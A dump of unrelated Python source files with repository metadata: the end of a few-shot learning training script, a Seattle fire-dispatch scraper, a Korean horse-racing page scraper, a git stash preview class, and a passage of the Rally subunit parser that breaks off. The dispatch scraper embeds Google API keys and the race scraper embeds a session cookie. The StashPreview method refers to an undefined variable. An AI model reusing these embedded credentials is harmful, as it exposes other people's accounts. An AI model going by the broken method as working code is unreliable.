n_shot=args.n_shot
n_query=args.n_query
nb_class_train = args.n_train_class
# test episode setting
n_query_test = args.n_test_query
nb_class_test=args.n_test_class
train_path = configs.imagenet_path
#save_path
save_path = 'save/baseline_' + str(args.save) + str(folder_num).zfill(3)
filename_5shot=save_path + '/miniImageNet_ResNet12'
filename_5shot_last= save_path + '/miniImageNet_ResNet12_last'
# set up training
# ------------------
model = Runner(nb_class_train=nb_class_train, nb_class_test=nb_class_test, input_size=3*84*84,
n_shot=n_shot, n_query=n_query, backbone=args.backbone,
transductive_train=args.transductive, flip=args.flip, drop=args.drop)
model.set_optimizer(learning_rate=initial_lr, weight_decay_rate=5e-4)
if not os.path.exists(save_path):
os.makedirs(save_path)
loss_h=[]
accuracy_h_val=[]
accuracy_h_test=[]
acc_best=0
epoch_best=0
# start training
# ----------------
if args.is_train:
train_generator = train_loader(data_file=train_path, nb_classes=nb_class_train,
nb_samples_per_class=n_shot + n_query, max_iter=max_iter)
for t, (images, labels) in train_generator:
# train
loss = model.train(images, labels)
# logging
loss_h.extend([loss.tolist()])
if (t % 100 == 0):
print("Episode: %d, Train Loss: %f "%(t, loss))
torch.save(model.model.state_dict(), filename_5shot_last)
if (t != 0) & (t % lrstep1 == 0):
for param_group in model.optimizer.param_groups:
param_group['lr'] *= 0.06
print('-------Decay Learning Rate to ', param_group['lr'], '------')
if (t != 0) & (t % lrstep2 == 0):
for param_group in model.optimizer.param_groups:
param_group['lr'] *= 0.2
print('-------Decay Learning Rate to ', param_group['lr'], '------')
accuracy_h5=[]
total_acc = []
checkpoint = torch.load(filename_5shot)
state_keys = list(checkpoint.keys())
for _, key in enumerate(state_keys):
if "classifier." in key:
checkpoint.pop(key)
# print(checkpoint.keys())
print('Evaluating the best {}-shot model for {}...'.format(n_shot,args.test_data))
test_data = args.test_data
aug_num = max(args.test_aug,1)
print('aug_num:',args.test_aug)
if 'cropdiseases' in test_data.lower():
save_name = 'CropDiseases'
test_path = configs.CropDisease_path
from utils.generator.generators_test import miniImageNetGenerator as test_loader
elif 'isic' in test_data.lower():
save_name = 'ISIC'
test_path = configs.ISIC_path
from utils.generator.generators_isic_test import miniImageNetGenerator as test_loader
elif 'eurosat' in test_data.lower():
save_name = 'EuroSAT'
test_path = configs.EuroSAT_path
from utils.generator.generators_eurosat_cropdiseases_test import miniImageNetGenerator as test_loader
elif 'chestx' in test_data.lower():
save_name = 'chestX'
test_path = configs.ChestX_path
from utils.generator.generators_chestX_test import miniImageNetGenerator as test_loader
else:
raise ValueError('Unknown test data')
for i in range(1):
test_generator = test_loader(data_file=test_path, nb_classes=nb_class_test,
nb_samples_per_class=n_shot+n_query_test, max_iter=600,aug_num=aug_num)
scores=[]
acc_all = []
prob_cls_list = []
prob_traductive_list = []
for j, (images, labels) in test_generator:
model.model.load_state_dict(checkpoint)
acc, prob, label, scores_cls, prob_cls = model.evaluate(images, labels)
# acc, prob, label = model.evaluate(images, labels)
score = acc.data.cpu().numpy()
scores.append(score)
print('Episode %3d : accuracy %4f'%(j, np.mean(score) * 100))
total_acc.append(np.mean(score) * 100)
# acc_all.append(scores_cls)
accuracy_t=100*np.mean(np.array(scores))
accuracy_h5.extend([accuracy_t.tolist()])
# print(('600 episodes with 15-query accuracy: {}-shot ={:.2f}%').format(n_shot, accuracy_t))
del(test_generator)
del(acc)
del(accuracy_t)
#
# acc_all = np.asarray(acc_all)
# acc_mean = np.mean(acc_all)
# acc_std = np.std(acc_all)
# print('Test Acc = %4.2f%% +- %4.2f%%' % ( acc_mean, 1.96 * acc_std / np.sqrt(600)))
stds = np.std(total_acc, axis=0)
ci95 = 1.96 * stds / np.sqrt(len(total_acc))
print(('Accuracy_test {}-shot ={:.2f}({:.2f})').format(n_shot, np.mean(accuracy_h5), ci95))
| 41.350254 | 109 | 0.610115 |
4a1b69377cbe114d0ff86a93ac41f2645662116e
| 7,955 |
py
|
Python
|
src/scripts/retrive_sfd_data.py
|
seattlepublicrecords/revealseattle
|
727d6fcaed3abd3170f4941d249067c52e86bf96
|
[
"Apache-2.0"
] | null | null | null |
src/scripts/retrive_sfd_data.py
|
seattlepublicrecords/revealseattle
|
727d6fcaed3abd3170f4941d249067c52e86bf96
|
[
"Apache-2.0"
] | 5 |
2016-10-12T05:21:56.000Z
|
2016-10-12T10:26:10.000Z
|
src/scripts/retrive_sfd_data.py
|
seattlepublicrecords/revealseattle
|
727d6fcaed3abd3170f4941d249067c52e86bf96
|
[
"Apache-2.0"
] | null | null | null |
import sys, traceback
from bs4 import BeautifulSoup
import rethinkdb as r
import requests
import time
import geocoder
import datetime
from dateutil.parser import parse as dtparse
from pytz import timezone
r.connect( "localhost", 28015).repl()
la = timezone('America/Los_Angeles')
table = r.db("revealseattle").table("dispatch_log")
dbtable = r.db("revealseattle").table("dispatch_log")
dbtable.delete().run()
def get_todays_dispatches():
already_geocoded = []
existing_data = dict([(row['id'], row) for row in dbtable.run()])
addresses_and_coordinates = dbtable.pluck('address', 'coordinates').run()
addresses_to_coordinates = dict([(item['address'], item['coordinates']) for item in addresses_and_coordinates if item.get('coordinates')])
addresses_and_place_names = dbtable.pluck('address', 'place_name').run()
addresses_to_place_names = dict([(item['address'], item['place_name']) for item in addresses_and_place_names if item.get('place_name', '').strip()])
addresses_and_assessor_ids = dbtable.pluck('address', 'assessor_id').run()
addresses_to_assessor_ids = dict([(item['address'], item['assessor_id']) for item in addresses_and_place_names if item.get('assessor_id', '').strip()])
html = requests.get('http://www2.seattle.gov/fire/realtime911/getRecsForDatePub.asp?action=Today&incDate=&rad1=des').text
soup = BeautifulSoup(html, 'lxml')
data = []
table = soup.findAll('tr')[3].find('table').find('table')
rows = table.find_all('tr')
# http://www2.seattle.gov/fire/realtime911/getRecsForDatePub.asp?incDate=09%2F24%2F16&rad1=des
previous_day = datetime.date.today()-datetime.timedelta(1)
previous_day = previous_day.strftime('%m%%2F%d%%2F%y')
html = requests.get('http://www2.seattle.gov/fire/realtime911/getRecsForDatePub.asp?incDate=%s&rad1=des' % (previous_day)).text
soup = BeautifulSoup(html, 'lxml')
data = []
table = soup.findAll('tr')[3].find('table').find('table')
rows.extend(table.find_all('tr'))
for row in rows:
cols = list(row.findAll('td'))
incident_id = cols[1].getText()
db_id = 'SFD_'+incident_id
existing_data_for_row = existing_data.get(db_id, {})
is_active = 'class="active"' in str(cols[0])
if is_active:
org_address = cols[4].getText()
address = org_address + ', Seattle'
address = address.replace('/', '&')
incident = {'id': db_id, 'agency': 'SFD', 'incident_id': incident_id, 'address': address, 'is_active': is_active, 'unit_timestamps': get_unit_dispatches_for_incident(incident_id)}
incident["number_of_units_dispatched"] = len(set([row['unit'] for row in incident["unit_timestamps"]]))
incident["number_of_units_in_service"] = len([row['in_service'] for row in incident["unit_timestamps"] if row['in_service']])
incident["org_address"] = org_address
incident["datetime"] = la.localize(dtparse(cols[0].getText()))
incident["type"] = cols[5].getText()
incident["streetview_url"] = 'https://maps.googleapis.com/maps/api/streetview?size=100x100&key=AIzaSyB59q3rCxkjqo3K2utcIh0_ju_-URL-L6g&location='+incident['address']
coordinates = addresses_to_coordinates.get(address)
if coordinates:
incident["coordinates"] = coordinates
else:
coordinates = geocoder.google(address, key='AIzaSyBE-WvY5WPBccBxW-97ZSBCBYEF80NBe7U').latlng
print coordinates
incident["coordinates"] = coordinates
place_name = addresses_to_place_names.get(address)
if place_name:
incident["place_name"] = place_name
else:
url = 'https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=%s,%s&radius=30.48&key=AIzaSyBE-WvY5WPBccBxW-97ZSBCBYEF80NBe7U' % (incident["coordinates"][0], incident["coordinates"][1])
print url
place_name = '; '.join([row.get('name', ' ') for row in requests.get(url).json()['results'][1:]])
incident["place_name"] = place_name
assessor_id = addresses_to_assessor_ids.get(address)
if assessor_id:
incident["assessor_id"] = assessor_id
incident["assessor_image_url"] = existing_data_for_row.get('assessor_image_url')
else:
url = 'http://gismaps.kingcounty.gov/parcelviewer2/addSearchHandler.ashx?add='+address
items = requests.get(url).json()['items']
incident["assessor_id"] = items[0].get('PIN', None) if items else None
url_beginning = 'http://blue.kingcounty.com/Assessor/eRealProperty/Dashboard.aspx?ParcelNbr='
if incident["assessor_id"]:
url = '%s%s' % (url_beginning, incident["assessor_id"])
print 'ASSESSOR url', url
assessor_html = requests.get(url).text
#print assessor_html
html_id = 'kingcounty_gov_cphContent_FormViewPictCurr_CurrentImage'
image_url_beginning = 'http://blue.kingcounty.com/Assessor/eRealProperty/'
assessor_soup = BeautifulSoup(assessor_html, 'lxml')
image_url_end = assessor_soup.find(id=html_id)['src']
image_url = '%s%s' % (image_url_beginning, image_url_end)
else:
image_url = ''
incident["assessor_image_url"] = image_url
address_history = existing_data_for_row.get('address_history')
if address_history:
incident["address_history"] = address_history
else:
url = 'https://data.seattle.gov/resource/grwu-wqtk.json?$order=datetime DESC&address='+org_address
print url
incident["address_history"] = requests.get(url, verify=False).json()
data.append(incident)
else:
# was it previously active in last loop?
try:
if dbtable.get('SFD_'+incident_id).run()['is_active']:
dbtable.get('SFD_'+incident_id).update({"is_active": False, "unit_timestamps": get_unit_dispatches_for_incident(incident_id)}).run()
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "*** print_tb:"
traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)
print "*** print_exception:"
traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=2, file=sys.stdout)
return data
def get_unit_dispatches_for_incident(incident_id):
incident_html = requests.get('http://www2.seattle.gov/fire/IncidentSearch/incidentDetail.asp?ID='+incident_id).text
incident_soup = BeautifulSoup(incident_html, 'lxml')
table = incident_soup.findAll('tr')[3].find('table').find('table')
rows = table.find_all('tr')
data = []
for row in rows[1:]:
cols = list(row.findAll('td'))
dispatched = cols[1].getText().strip()
arrived = cols[2].getText().strip()
in_service = cols[3].getText().strip()
data.append({'unit': cols[0].getText().strip().strip('*'), 'dispatched': dispatched, 'arrived': arrived, 'in_service': in_service})
return data
while True:
print '*'
try:
todays_data = get_todays_dispatches()
#print todays_data
print table.insert(todays_data).run(conflict='update')
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "*** print_tb:"
traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)
print "*** print_exception:"
traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=2, file=sys.stdout)
time.sleep(5)
| 56.021127 | 215 | 0.63193 |
4a1b696566f3e9b6158ddef3d52f0b73d594152b
| 12,977 |
py
|
Python
|
kra.py
|
jangbi882/KraRaceCollector
|
7598639af7b299a3995ba41a598bec57478d3742
|
[
"Apache-2.0"
] | null | null | null |
kra.py
|
jangbi882/KraRaceCollector
|
7598639af7b299a3995ba41a598bec57478d3742
|
[
"Apache-2.0"
] | null | null | null |
kra.py
|
jangbi882/KraRaceCollector
|
7598639af7b299a3995ba41a598bec57478d3742
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import urllib
import urllib2
from bs4 import BeautifulSoup
import re
import sys
import locale
import os.path
import time
os_encoding = locale.getpreferredencoding()
file_base = os.path.basename(__file__)
# 시간 파싱에 공통적으로 사용할 정규식.
time_re = re.compile(r"^(\d+)\:(\d+).(\d+)$")
option_data = {
"contestant": {
"desc" : u"출전상세정보",
"url": 'http://race.kra.co.kr/chulmainfo/chulmaDetailInfoChulmapyo.do',
"values" : {
"rcDate": '{date}',
"rcNo": '{race_no}',
"Sub":"1",
"Act":"02",
"meet": '{city}'
},
"data_table_no" : 2,
"split_column_list" : [(6, r"(\d+\.*\d*)\((\-*\d+\.*\d*)\)", 0), (7, r"\((.*)\)(.*)", 1)]
},
"record": {
"desc" : u"전적",
"url": 'http://race.kra.co.kr/chulmainfo/chulmaDetailInfoRecord.do',
"values" : {
"rcDate": '{date}',
"rcNo": '{race_no}',
"Sub":"1",
"Act":"02",
"meet": '{city}'
},
"data_table_no" : 2,
"split_column_list" : [(2, r"(\d+)\((\d+)\/(\d+)\)", 0), (3, r"(.*)\%", 0), (4, r"(.*)\%", 0)
,(5, r"(\d+)\((\d+)\/(\d+)\)", 0), (6, r"(.*)\%", 0), (7, r"(.*)\%", 0)]
},
"course_rec": {
"desc" : u"해당거리전적",
"url": 'http://race.kra.co.kr/chulmainfo/chulmaDetailInfoDistanceRecord.do',
"values" : {
"rcDate": '{date}',
"rcNo": '{race_no}',
"Sub":"1",
"Act":"02",
"meet": '{city}'
},
"data_table_no" : 2,
"split_column_list" : [(2, r"(\d+)\((\d+)\/(\d+)\)", 0), (3, r"(.*)\%", 0), (4, r"(.*)\%", 0)
,(5, r"(\d+\:\d+.\d+).+", 0), (6, r"(\d+\:\d+.\d+).+", 0), (7, r"(\d+\:\d+.\d+).+", 0)]
},
"near10_rec": {
"desc" : u"최근10회전적",
"url": 'http://race.kra.co.kr/chulmainfo/chulmaDetailInfo10Score.do',
"values" : {
"rcDate": '{date}',
"rcNo": '{race_no}',
"Sub":"1",
"Act":"02",
"meet": '{city}'
},
"data_table_no" : 2,
"split_column_list" : [(14, r"(.+)\((.+)\)", 0)],
"skip_column_list" : [15, 16, 17]
},
}
def get_table(option, date, race_no, table_no, city):
try:
info = option_data[option]
except KeyError:
return None
if city == "seoul": i_city = 1
elif city == "jeju" : i_city = 2
elif city == "busan" : i_city = 3
else: i_city = 1
url = info["url"]
values = info["values"]
for key in values.keys():
val = values[key]
if val == '{date}': values[key] = date
elif val == '{race_no}' : values[key] = race_no
elif val == '{city}' : values[key] = i_city
# 데이터가 있는 테이블 번호; 0에서 시작
data_table_no = info["data_table_no"]
# 둘로 나눌 컬럼 리스트; 0에서 시작
# (col_no, pattern, def_col)
split_column_list = info["split_column_list"]
# 무시 컬럼 리스트
if "skip_column_list" in info:
skip_column_list = info["skip_column_list"]
else:
skip_column_list = None
# 해더를 잘 적어 주지 않으면 시스템이 비정상 호출로 거부 당한다.
headers = {
"Accept-Encoding" : "gzip, deflate, sdch"
,"Accept-Language" : "ko,en-US;q=0.8,en;q=0.6"
,"Upgrade-Insecure-Requests" : "1"
,"User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
,"Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
,"Referer" : url
# 쿠키는 변경된 가능성을 확인해야 한다.
,"Cookie" : "WMONID=Nz7aZM1C3N0; NRACE_JSESSIONID=Of-NDgpECnNTA7a91UDqWQ7Nw-9Yvyy_Pp3PO1DsIFt9DAHhBzkO!-1826629772; itoken=null"
,"Connection" : "keep-alive"
}
data = urllib.urlencode(values)
try:
# 데이터가 한 번에 나오지 않는 경우가 있어 NUM_RETRY회까지 재요청하게 구조 수정
NUM_RETRY = 20
for num_iter in range(NUM_RETRY):
request = urllib2.Request(url, data, headers)
response = urllib2.urlopen(request)
# 마사회 페이지는 euc-kr
# page = response.read().decode('euc-kr', 'ignore')
# page = response.read().decode('cp949', 'ignore')
# 하지만 인코딩을 지정해 주면 오히려 깨진다.
page = response.read()
response.close()
with open("dump.html", "w") as out_file:
out_file.write(page)
# parser로 lxml을 사용. 별도 설치 필요. 더 빠르고 강력하다.
# soup = BeautifulSoup(page, "lxml")
# 여기서 인코딩을 지정해 주어야 한다.
## lxml 파서의 경우 html을 파싱하다 잘리는 경우가 많이 발견되어 html.parser로 변경
# soup = BeautifulSoup(page, "lxml", from_encoding='cp949')
soup = BeautifulSoup(page, 'html.parser', from_encoding='cp949')
######
# 파일이름 정하기
filename = u"{0}_{1}_{2}_race{3:02d}.txt".format(city, option, date, int(race_no))
######
# 대상 테이블 찾기
try:
i_table_no = int(table_no) - 1
except Exception:
if data_table_no:
i_table_no = data_table_no
else:
i_table_no = 0
all_table = soup.find_all("table")
num_all_table = len(all_table)
if num_all_table > 0 or num_iter+1 >= NUM_RETRY:
break
print ("Retrying...")
time.sleep(2)
if i_table_no >= num_all_table:
i_table_no = num_all_table - 1
elif i_table_no < 0:
i_table_no = 0
#결국 못 얻어온 경우
if i_table_no < 0:
print ("FAIL!!!")
return False
headers = []
rows = []
for i_table_no in range(i_table_no, (i_table_no)+1 if option != "near10_rec" else len(all_table)):
table = all_table[i_table_no]
######
tr_rows = []
# 컬럼 헤더 만들기
for tr in table.find_all('tr'):
ths = tr.select("th")
if len(ths) > 0:
tr_rows.append(tr)
# 최근10회전적 예외 처리
horse_name = None
if option == "near10_rec":
if len(tr_rows) > 0:
anchor = tr_rows[0].select("a")[0]
horse_name = anchor.text.encode("utf-8").strip()
del tr_rows[0]
else:
horse_name = "Unknown"
if len(headers) <= 0:
if len(tr_rows) == 1:
headers = [header.text.encode("utf-8").strip() for header in tr_rows[0].select("th")]
elif len(tr_rows) == 2:
tr1 = tr_rows[0].select("th")
tr2 = tr_rows[1].select("th")
tr2_ptr = 0
for th1 in tr1:
try:
rowspan = int(th1['rowspan'])
except KeyError:
rowspan = 1
try:
colspan = int(th1['colspan'])
except KeyError:
colspan = 1
th1_str = th1.text.encode("utf-8").strip()
if colspan == 1:
headers.append(th1_str)
else:
for i in range(tr2_ptr, tr2_ptr+colspan):
th2 = tr2[i]
th2_str = th2.text.encode("utf-8").strip()
headers.append(th1_str+"_"+th2_str)
tr2_ptr += colspan
# 무시 컬럼 처리
if skip_column_list:
skip_column_list.sort(reverse=True)
for col_no in skip_column_list:
if len(headers) > col_no:
del(headers[col_no])
# 둘로 나눠야 하는 컬럼 추가
if split_column_list:
split_column_list.sort(reverse=True)
for logic in split_column_list:
col_no = logic[0]
r = re.compile(logic[1])
num_cal = r.groups
org_col_name = headers[col_no]
headers[col_no] = org_col_name+"_1"
for n in range(1, num_cal):
headers.insert(col_no+n, org_col_name+"_{}".format(n+1))
# 최근10회전적 예외처리
if horse_name:
headers.insert(0, "마명")
######
# 데이터 넣기
for row in table.find_all('tr'):
cols = row.find_all('td')
col_data =[re.sub(u"\s+", " ", val.text.encode("utf-8").strip().replace("\n", " ")) for val in cols]
if len(cols) <= 0:
continue
# 무시 컬럼 데이터 제거
if skip_column_list:
for col_no in skip_column_list:
if len(col_data) > col_no:
del(col_data[col_no])
if split_column_list:
# 여러 컬럼으로 분라하거나 특수문자 제거
for logic in split_column_list:
col_no = logic[0]
r = re.compile(logic[1])
num_cal = r.groups
def_cal = logic[2]
org_val = col_data[col_no]
del col_data[col_no]
match = r.search(org_val)
if match:
vals = match.groups()
vals = reversed(vals)
for val in vals:
col_data.insert(col_no, val)
else:
for i in range(num_cal-1, -1 , -1):
if i == def_cal:
col_data.insert(col_no, org_val)
else:
col_data.insert(col_no, '')
# 시간을 변환하여야 하는 것이 있는지 확인
for i, val in enumerate(col_data):
res = time_re.search(val)
if res:
col_data[i] = str(int(res.group(1))*60 + float(res.group(2)+"."+res.group(3)))
# 최근10회전적 예외처리
if horse_name:
col_data.insert(0, horse_name)
# 빈 자료를 NA로 변경
col_data = ["NA" if d == "" else d for d in col_data]
rows.append(col_data)
csv = ",".join(headers)
csv += "\n"
######
# 파일에 쓰기
for row in rows:
if len(row) > 0:
csv += ",".join(row)
csv += "\n"
with open(filename, "w") as out_file:
out_file.write(csv)
except urllib2.HTTPError, e:
print e.reason.args[1]
return False
except urllib2.URLError, e:
print e.reason.args[1]
return False
except Exception as e:
# print str(e)
# return False
raise e
return filename
#############
def help(add_val):
print "USAGE :\t{}{} <city> <option> <date> <race_no> [<table_no>]".format("python " if add_val==1 else "", file_base)
print "EXAMPLE :\t{}{} busan contestant 20150719 1".format("python " if add_val==1 else "", file_base)
print
print "\n== Option List =="
for cmd in option_data.keys():
print u"{}\t:\t{}".format(cmd, option_data[cmd]["desc"])
exit()
if __name__ == '__main__':
by_python = 0
if len(sys.argv) < 1:
help(by_python)
if sys.argv[0] == file_base:
by_python = 1
if len(sys.argv) < 3+by_python:
help(by_python)
city = sys.argv[1]
option = sys.argv[2]
date = sys.argv[3]
race_no = sys.argv[4]
if 5 < len(sys.argv):
table_no = sys.argv[5]
else:
table_no = None
'''
city = "busan"
option = "near10_rec"
date = "20151129"
race_no = "5"
table_no = None
'''
command_list = option_data.keys()
if option not in command_list:
print "Invalid option: {}".format(option)
help(by_python)
filename = get_table(option, date, race_no, table_no if option=="score" else None, city)
if filename:
print("Result file {} is created.".format(filename.encode(os_encoding)))
else:
print("An error occurred!")
| 33.619171 | 137 | 0.440009 |
4a1b6abc90f837cc055b7bd146d1b5643881a1e7
| 2,190 |
py
|
Python
|
git_gopher/StashPreview.py
|
derekhamilton/git-gud
|
7fd377a39796b0aa1268e7ecda6808e8e45173fe
|
[
"MIT"
] | 15 |
2019-11-13T20:59:53.000Z
|
2020-12-15T05:21:21.000Z
|
git_gopher/StashPreview.py
|
derekhamilton/git-gud
|
7fd377a39796b0aa1268e7ecda6808e8e45173fe
|
[
"MIT"
] | 50 |
2019-10-12T16:57:11.000Z
|
2019-10-27T21:03:22.000Z
|
git_gopher/StashPreview.py
|
derekhamilton/git-gud
|
7fd377a39796b0aa1268e7ecda6808e8e45173fe
|
[
"MIT"
] | 1 |
2019-11-14T03:20:21.000Z
|
2019-11-14T03:20:21.000Z
|
from os.path import isfile
from pathlib import Path
from pygments import highlight
from pygments.lexers import guess_lexer
from pygments.formatters import TerminalFormatter
from colorama import Fore, Style
import shutil
from git_gopher.GitDataGetter import GitDataGetter
class StashPreview:
def __init__(self, git_data_getter: GitDataGetter):
self._git_data_getter = git_data_getter
def preview(self, stash_ref):
formatter = TerminalFormatter()
stash_contents = self._git_data_getter.get_stash_contents(stash_ref)
if isfile(file_path):
if self._git_data_getter.get_is_tracked(file_path):
diff = self._git_data_getter.get_diff(file_path)
lexer = guess_lexer(diff)
return highlight(diff, lexer, formatter)
else:
try:
file_contents = Path(file_path).read_text()
except UnicodeDecodeError:
return 'Cannot show preview for this file.'
lexer = guess_lexer(file_contents)
return highlight(file_contents, lexer, formatter)
diff = self._git_data_getter.get_diff(file_path)
if diff:
lexer = guess_lexer(diff)
return highlight(diff, lexer, formatter)
files = self._git_data_getter.get_unstaged_files_from_dir(file_path).splitlines()
output = ""
for file in files:
#output += u'\u2500' * terminal_width
output += "\n"
output += self.get_horizontal_line()
output += Style.RESET_ALL
output += file
output += self.get_horizontal_line()
try:
file_contents = Path(file).read_text()
lexer = guess_lexer(file_contents)
output += highlight(file_contents, lexer, formatter)
except UnicodeDecodeError:
output += 'Cannot show preview for this file.'
return output
def get_horizontal_line(self) -> str:
terminal_width = shutil.get_terminal_size().columns
return "\n" + Fore.YELLOW + (u'\u2500' * terminal_width) + Style.RESET_ALL + "\n"
| 37.118644 | 89 | 0.629224 |
4a1b6add88dfcab9de5ffbebaa6bb6ff1fcaa3fd
| 1,695 |
py
|
Python
|
lc/lc204_count_primes.py
|
totoro72/pt1
|
92cffb9b36ebe2023243446e560e54200b0bd6e9
|
[
"MIT"
] | null | null | null |
lc/lc204_count_primes.py
|
totoro72/pt1
|
92cffb9b36ebe2023243446e560e54200b0bd6e9
|
[
"MIT"
] | 17 |
2020-09-04T16:35:48.000Z
|
2022-03-02T03:21:39.000Z
|
lc/lc204_count_primes.py
|
totoro72/pt1
|
92cffb9b36ebe2023243446e560e54200b0bd6e9
|
[
"MIT"
] | null | null | null |
import math
class Solution(object):
def countPrimes_slow(self, n):
"""Return the number of primes p where p < n and n >= 0"""
if n <= 2:
return 0
# if n == 2, 2 is a rpime. but not include that
primes = [2]
for k in range(3, n):
# test if any of the primes divides k
is_prime = True
for p in primes:
if k % p == 0:
is_prime = False
break
if is_prime:
primes.append(k)
return len(primes)
def countPrimes(self, n):
"""Return the number of primes p where p < n and n >= 0 (fast version)"""
if n <= 2:
return 0
# now at least [0, 1, 2, ...]
primes = [True] * n
primes[0], primes[1] = False, False
for k in range(2, n):
if primes[k]:
# knock out multiples of k
primes[k*2:n:k] = [False] * len(primes[k*2:n:k])
return primes.count(True)
def countPrimesImproved(self, n):
"""Return the number of primes p where p < n and n >= 0 (fast version)"""
if n <= 2:
return 0
# now at least [0, 1, 2, ...]
primes = [True] * n
primes[0], primes[1] = False, False
for k in range(2, math.ceil(n**0.5)): # NOTE: since we start at k*k, it's meaningless empty set when k > sqrt(n)
if primes[k]:
# knock out multiples of k
# NOTE: Improved: start from k*k because k*2 shoulda been knocked out by prime 2
primes[k*k:n:k] = [False] * len(primes[k*k:n:k])
return primes.count(True)
| 33.235294 | 121 | 0.487316 |
4a1b6c224f87f129c248e783915207f2bfc8cfdb
| 9,839 |
py
|
Python
|
rally/common/io/subunit_v2.py
|
tyzhnenko/rally
|
1d9c1e82f33686c80e49edd041fcd8d0253afdb1
|
[
"Apache-2.0"
] | 263 |
2015-04-26T16:05:34.000Z
|
2022-02-28T11:17:07.000Z
|
rally/common/io/subunit_v2.py
|
tyzhnenko/rally
|
1d9c1e82f33686c80e49edd041fcd8d0253afdb1
|
[
"Apache-2.0"
] | 19 |
2015-04-23T11:53:10.000Z
|
2019-02-20T11:23:09.000Z
|
rally/common/io/subunit_v2.py
|
tyzhnenko/rally
|
1d9c1e82f33686c80e49edd041fcd8d0253afdb1
|
[
"Apache-2.0"
] | 287 |
2015-04-23T11:28:03.000Z
|
2021-09-16T13:05:53.000Z
|
# Copyright 2015: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from subunit import v2
from rally.common import logging
from rally.utils import encodeutils
_IGNORE_LIST = [
"subunit.parser"
]
def prepare_input_args(func):
# NOTE(andreykurilin): Variables 'runnable', 'eof', 'route_code' are not
# used in parser.
def inner(self, test_id=None, test_status=None, timestamp=None,
file_name=None, file_bytes=None, mime_type=None, test_tags=None,
runnable=True, eof=False, route_code=None):
if not test_id or test_id in _IGNORE_LIST:
return
if (test_id.startswith("setUpClass (")
or test_id.startswith("tearDown (")):
test_id = test_id[test_id.find("(") + 1:-1]
tags = _parse_test_tags(test_id)
func(self, test_id, test_status, timestamp, tags,
file_name, file_bytes, test_tags, mime_type)
return inner
def _parse_test_tags(test_id):
tags = []
if test_id.find("[") > -1:
tags = test_id.split("[")[1][:-1].split(",")
return tags
class SubunitV2StreamResult(object):
def __init__(self, expected_failures=None, skipped_tests=None, live=False,
logger_name=None):
self._tests = {}
self._expected_failures = expected_failures or {}
self._skipped_tests = skipped_tests or {}
self._live = live
self._logger = logging.getLogger(logger_name or __name__)
self._timestamps = {}
# NOTE(andreykurilin): _first_timestamp and _last_timestamp variables
# are designed to calculate the total time of tests execution.
self._first_timestamp = None
self._last_timestamp = None
# Store unknown entities and process them later.
self._unknown_entities = {}
self._is_parsed = False
@staticmethod
def _get_test_name(test_id):
return test_id.split("[")[0] if test_id.find("[") > -1 else test_id
def _check_expected_failure(self, test_id):
if (test_id in self._expected_failures
or self._get_test_name(test_id) in self._expected_failures):
if self._tests[test_id]["status"] == "fail":
self._tests[test_id]["status"] = "xfail"
if self._expected_failures[test_id]:
self._tests[test_id]["reason"] = (
self._expected_failures[test_id])
elif self._tests[test_id]["status"] == "success":
self._tests[test_id]["status"] = "uxsuccess"
def _process_skipped_tests(self):
for t_id in self._skipped_tests.copy():
if t_id not in self._tests:
status = "skip"
name = self._get_test_name(t_id)
self._tests[t_id] = {"status": status,
"name": name,
"duration": "%.3f" % 0,
"tags": _parse_test_tags(t_id)}
if self._skipped_tests[t_id]:
self._tests[t_id]["reason"] = self._skipped_tests[t_id]
status += ": %s" % self._tests[t_id]["reason"]
if self._live:
self._logger.info("{-} %s ... %s" % (name, status))
self._skipped_tests.pop(t_id)
def _parse(self):
# NOTE(andreykurilin): When whole test class is marked as skipped or
# failed, there is only one event with reason and status. So we should
# modify all tests of test class manually.
for test_id in self._unknown_entities:
known_test_ids = filter(
lambda t: t == test_id or t.startswith("%s." % test_id),
self._tests)
for t_id in known_test_ids:
if self._tests[t_id]["status"] == "init":
self._tests[t_id]["status"] = (
self._unknown_entities[test_id]["status"])
if self._unknown_entities[test_id].get("reason"):
self._tests[t_id]["reason"] = (
self._unknown_entities[test_id]["reason"])
elif self._unknown_entities[test_id].get("traceback"):
self._tests[t_id]["traceback"] = (
self._unknown_entities[test_id]["traceback"])
# decode data
for test_id in self._tests:
for file_name in ["traceback", "reason"]:
# TODO(andreykurilin): decode fields based on mime_type
if file_name in self._tests[test_id]:
self._tests[test_id][file_name] = (
encodeutils.safe_decode(
self._tests[test_id][file_name]))
self._is_parsed = True
@property
def tests(self):
if not self._is_parsed:
self._parse()
return self._tests
@property
def totals(self):
td = 0
if self._first_timestamp:
td = (self._last_timestamp - self._first_timestamp).total_seconds()
return {"tests_count": len(self.tests),
"tests_duration": "%.3f" % td,
"failures": len(self.filter_tests("fail")),
"skipped": len(self.filter_tests("skip")),
"success": len(self.filter_tests("success")),
"unexpected_success": len(self.filter_tests("uxsuccess")),
"expected_failures": len(self.filter_tests("xfail"))}
@prepare_input_args
def status(self, test_id=None, test_status=None, timestamp=None, tags=None,
file_name=None, file_bytes=None, worker=None, mime_type=None):
if timestamp:
if not self._first_timestamp:
self._first_timestamp = timestamp
self._last_timestamp = timestamp
if test_status == "exists":
self._tests[test_id] = {"status": "init",
"name": self._get_test_name(test_id),
"duration": "%.3f" % 0,
"tags": tags if tags else []}
elif test_id in self._tests:
if test_status == "inprogress":
# timestamp of test start
self._timestamps[test_id] = timestamp
self._tests[test_id]["timestamp"] = timestamp.strftime(
"%Y-%m-%dT%H:%M:%S%z")
elif test_status:
